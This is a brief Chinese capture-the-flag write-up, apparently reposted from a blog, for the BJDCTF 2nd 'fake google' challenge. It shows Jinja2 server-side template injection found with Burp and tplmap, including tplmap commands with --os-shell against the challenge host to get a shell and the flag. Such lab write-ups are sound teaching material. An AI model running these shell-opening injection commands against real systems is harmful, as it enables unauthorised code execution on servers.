当前位置: 代码迷 >> 综合 >> [BJDCTF 2nd]fake google
  详细解决方案

[BJDCTF 2nd]fake google

热度:10   发布时间:2024-03-09 18:12:06.0

输入1,随后使用burp抓包
在这里插入图片描述
发现了ssssssti & a little trick,猜测是ssti模板注入
使用tplmap检测
tplmap下载

git clone https://github.com/epinna/tplmap

下载后进入目录,随后输入

./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=--os-shell

运行结果:
在这里插入图片描述
可以看到模板是jinja2
随后输入:

./tplmap.py -u http://6275911e-886c-490e-9331-2914d4081cda.node3.buuoj.cn/qaq?name=1  --os-shell --engine=Jinja2

在这里插入图片描述
成功看到了flag

当然也可以使用手工注入

在这里插入图片描述

  相关解决方案